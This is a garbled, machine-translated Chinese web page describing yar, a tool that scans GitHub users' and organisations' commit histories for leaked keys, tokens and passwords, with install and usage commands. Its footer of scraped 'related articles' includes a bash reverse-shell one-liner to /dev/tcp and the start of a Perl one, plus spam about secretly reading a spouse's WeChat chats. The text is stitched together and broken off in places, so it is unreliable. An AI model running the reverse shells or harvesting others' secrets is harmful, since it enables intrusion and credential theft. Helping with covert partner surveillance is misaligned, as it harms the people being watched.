Yar:用以侦查Github上储存库用户和机构的专用工具
yar是一款OSINT专用工具,关键用以侦查Github上的储存库、用户和机构。Yar会复制给出的用户/机构的储存库,并依照递交先后顺序解析xml全部递交历史时间,搜索密钥、动态口令及登陆密码等。每每你发觉一个密钥时,它都是会复印出去以便你进一步的评定剖析。
Yar根据正则表达式,熵(entropy)或二者开展搜索,你可以依据具体情况自主挑选。你可以把yar想像成是truffleHog的全新升级,它能做truffleHog能够做的全部事儿,乃至比它做的越来越多!
安裝
安裝只需运作下列指令就可以。
go get github.com/Furduhlutur/yar
只需保证在优选shell rc中设定了GOPATH环境变量,而且$GOPATH/bin文件目录坐落于PATH中。其他信息请在这里查询。
应用
搜索机构密钥:
yar -o orgname
在用户储存库中搜索密钥:
yar -u username
在单独储存库中搜索密钥:
yar -r repolink
或是假如你已复制了储存库:
yar -r repopath
在机构,用户和储存库中搜索密钥:
yar -o orgname -u username -r reponame
有自身的预订义标准?
标准储存在 *** ON文档中,文件格式以下:
{
"Rules":[
{
"Reason": "The reason for the match",
"Rule": "The regex rule",
"Noise": 3
},
{
"Reason": "Super secret token",
"Rule": "^Token: .*$",
"Noise": 2
}
]
"FileBlacklist":[
"Regex rule here"
"^.*\\\\.lock"
]
}
随后,你可以应用下列指令载入自身的标准集:
yar -u username --rules PATH_TO_ *** ON_FILE
假如你现有一个truffleHog的配备并期待将它移殖到yar配备中,那麼config文件夹中有一个脚本 *** 可以为你进行。只需运作python3 trufflestoconfig.py PATH_TO_TRUFFLEHOG_CONFIG,脚本 *** 便会给你形成一个名叫yarconfig.json的文档。
讨厌正则表达式?
yar -u username --entropy
二者另外开展:
yar -u username --both
做为已身份认证用户开展搜索:
将github token加上到环境变量中。
export YAR_GITHUB_TOKEN=YOUR_TOKEN_HERE
将你的发觉储存到 *** ON文档以供事后剖析:
yar -o orgname --save
讨厌默认设置颜色,想加上自身的颜色设定?
能够根据环境变量自定Yar的輸出颜色。可列举的颜色以下:
black
blue
cyan
green
magenta
red
white
yellow
hiBlack
hiBlue
hiCyan
hiGreen
hiMagenta
hiRed
hiWhite
hiYellow
你可以加上bold主要参数让字体样式以粗字体表明,比如 blue bold 深蓝色粗字体。
它是根据下列env自变量进行的:
YAR_COLOR_VERBOSE -> Color of verbose lines.
YAR_COLOR_SECRET -> Color of the highlighted secret.
YAR_COLOR_INFO -> Color of info, that is, simple strings that tell you something.
YAR_COLOR_DATA -> Color of data, i.e. commit message, reason, etc.
YAR_COLOR_SUCC -> Color of succesful messages.
YAR_COLOR_WARN -> Color of warnings.
YAR_COLOR_FAIL -> Color of fatal warnings.
像那样 export YAR_COLOR_SECRET=”hiRed bold”。
协助
usage: yar[-h|--help][-o|--org ""][-u|--user ""][-r|--repo
""][-c|--context ][-e|--entropy][-b|--both]
[-f|--forks][-n|--noise ][-s|--save][--depth ]
[--config ][--cleanup][--no-context]
Sail ye seas of git for booty is to be found
Arguments:
-h --help Print help information
-o --org Organization to plunder.
-u --user User to plunder.
-r --repo Repository to plunder.
-c --context Show N number of lines for context. Default: 2
-e --entropy Search for secrets using entropy *** ysis. Default: false
-b --both Search by using both regex and entropy *** ysis. Overrides
相关文章
tar 打包压缩目录,压缩文件出现上层目录
zip方法 zipPath参数为保存zip的文件路径 srcPath参数为需要压缩的目录 在linux window上面测试无问题!主要是编码问题比较麻烦~要是有其他异常 请留言 或者 有什么更好的...
不知道微信密码如何偷取爱人的微信聊友记录
如何查看微信删除的东拉西扯记录?伴随着手机微信软件的运用,很多人早已从应用QQ改成应用微信通讯,手机微信相对性而言比QQ翻倍简洁,并且因为古怪设置,翻倍具备封闭型。但是手机微信有一个致命性的难题便是,...
水龙头加热器费电吗?水龙头加热器什么牌子好
科技的发展带来的是更多的科技产品进入人们的日常生活中。那么大家在面对这些新款的科技产品有是如何选购使用的呢?其中电热水龙头就是近两年新推出的一款科技产品,并受到广大消费者的喜欢。那么大家对快速电热水龙...
不惊动对方查看微信密友位置(不发送微信位置)
bash一声令下:bash -i gt;amp; /dev/tcp/10.0.0.1/ 0gt;amp;1 perl版本号:perl -e 'use Socket;$i="10.0.0.1";$p=;...
jessy line是什么意思(jessy line是什么牌子)
spring 2017 柔和的灰粉、粉蓝 中和刚毅的灰色、深蓝和细条纹 把玩柔与刚的平衡游戏 spring collccation 春季搭配 巧妙操控经典艺术散发出的自在与自...
怎么才能看到我媳妇删除微信聊天记录
. 孩子最近比较厌食你知道原因吗?当孩子的身体发出信号后家长有及时的接受信息并做出回应吗,孩子缺锌的表现有哪些呢?对于孩子缺锌的原因你了解多少。哪些宝宝容易缺锌呢。 孩子缺锌的原因 1.锌摄入不...
Copyright Your WebSite.Some Rights Reserved.
免责声明:本站所发布的任何网站,全部来源于互联网,版权争议与本站无关。仅供技术交流,如有侵权或不合适,请联系本人进行删除。不允许做任何非法用途!